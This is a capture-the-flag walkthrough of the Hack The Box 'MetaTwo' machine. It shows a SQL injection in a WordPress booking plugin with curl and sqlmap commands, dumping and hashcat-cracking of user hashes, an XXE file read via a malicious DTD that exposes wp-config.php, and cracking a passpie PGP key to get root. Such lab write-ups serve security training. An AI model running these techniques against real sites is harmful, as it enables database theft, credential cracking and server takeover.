[HTB] : MetaTwo Walkthrough
Initial Recon:
From the initial enumeration we can know that the website is using Wordpress. So, first I ran wpscan with an api_key and got dozens of vulnerabilities, however one of them was interesting since it had an public exploit and we could pave an initial foothold.
wpscan — url http://metapress.htb/ — plugins-detection mixed -e ap,at — api-token <token_here> | tee wpscan.txt
curl -i 'https://metapress.htb/wp-admin/admin-ajax.php' \ --data 'action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category_id=33&total_service=1 --proxy http://127.0.0.1:8080
Here, the “_wpnonce” value should be replaced from the website’s source code, so that the server thinks the request is coming from the site itself.
After that I sent the request to sqlmap to enumerate the database content.
sqlmap -r req.txt -p total_service --dbs --dump
sqlmap -r req.txt -D blog --tablessqlmap -r req.txt -D blog -T wp_users --dumpEnumerating the database, I got the WordPress users hashed login credentials.
First, I passed the hash to hashid and cracked the manager’s account password hash which gave access to wordpress.
hashcat -a 0 -m 400 -o crack.txt hash.txt /usr/share/wordlist/rockyou.txtGoing through the wpscan result, we had found that the website is vulnerable to authenticated XXE (https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357). So, I had to craft and upload a malicious dtd file from file manger and whenever the server parsed the malicious file we could read arbitary file from the vulnerable web-server.
Now, we had to find the location of wp-config.php file from the web-server. Since, the website was using nginx we changed the file path in evil.dtd to “/etc/nginx/sites-enabled/default” and got the wordpress installation directory “var/www/metapress.htb/blog” and finally the wp-config.php’s content that contained the ftp password.
The FTP server had an credential for the ssh user in the file send_email.php.
Dgging through the files of user jnelson I found a passpie directory containg the root password encrypted with a key. Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface.
I firstly converted the pgp key to john formatusing gpg2john and finally got the key for the root password.
Finally using the cracked key I got the root password.
